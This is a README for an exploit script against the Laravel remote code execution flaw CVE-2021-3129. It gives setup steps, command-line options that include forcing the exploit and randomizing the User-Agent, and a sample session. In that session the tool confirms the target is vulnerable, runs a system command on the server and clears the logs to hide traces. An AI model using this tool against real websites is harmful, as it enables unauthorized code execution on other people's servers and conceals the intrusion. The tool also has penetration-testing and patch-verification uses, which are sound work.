CVE-2021-3129 - Laravel RCE
About
The script has been made for exploiting the Laravel RCE (CVE-2021-3129) vulnerability.
This script allows you to write/execute commands on a website running Laravel <= v8.4.2, that has "APP_DEBUG" set to "true" in its ".env" file.
It currently has support for searching the log file, executing commands, writing to the log file, and support for clearing log files.
Setup
$ git clone https://github.com/joshuavanderpoll/CVE-2021-3129.git
$ cd CVE-2021-3129
# pip install -r requirements.txt
# python3 CVE-2021-3129.py --help
Options
usage: CVE-2021-3129.py [-h] [--host HOST] [--force] [--log LOG] [--ua]
[--chain CHAIN] [--chains]
Exploit CVE-2021-3129 - Laravel vulnerability exploit script
optional arguments:
-h, --help show this help message and exit
--host HOST Host URL to use exploit on
--force Force exploit without checking if vulnerable
--log LOG Full path to laravel.log file (e.g.
/var/www/html/storage/logs/laravel.log)
--ua Randomize User-Agent for requests
--chain CHAIN Select PHPGGC chain. Use "--chains" parameter to view all
available chains.
--chains View available chains for the "--chain" parameter
Example
$ python3 CVE-2021-3129.py --host http://127.0.0.1/public/
Laravel Debug Mode CVE script
[•] Made by: https://jvdpoll.nl
[@] Starting exploit on "http://127.0.0.1/public/"...
[@] Testing vulnerable URL http://127.0.0.1/public/_ignition/execute-solution...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Log path found: "/home/laravel/web/storage/logs/laravel.log"
[•] Laravel log found: "/home/laravel/web/storage/logs/laravel.log".
[•] Laravel version found: "7.22.4".
[√] Laravel log file set to "/home/laravel/web/storage/logs/laravel.log".
[•] Use "?" for a list of all possible actions.
[?] Please enter a command to execute: help
[•] Available commands:
exit - Exit program.
help - Shows available commands.
clear_logs - Clears Laravel logs.
execute <command> - Execute system command.
write <command> - Write to log file.
[?] Please enter a command to execute: execute ls /home/laravel/web/
[@] Executing command "ls /home/laravel/web/"...
[@] Generating payload...
[√] Generated payload.
[@] Clearing logs...
[√] Cleared logs.
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payload...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Result:
README.md
app
artisan
bootstrap
composer.json
composer.lock
config
database
package.json
phpunit.xml
public
resources
routes
server.php
storage
tests
vendor
webpack.mix.js
[@] Clearing logs...
[√] Cleared logs.
Future:
- Automatically determine PHPGCC chain if version detected while scanning.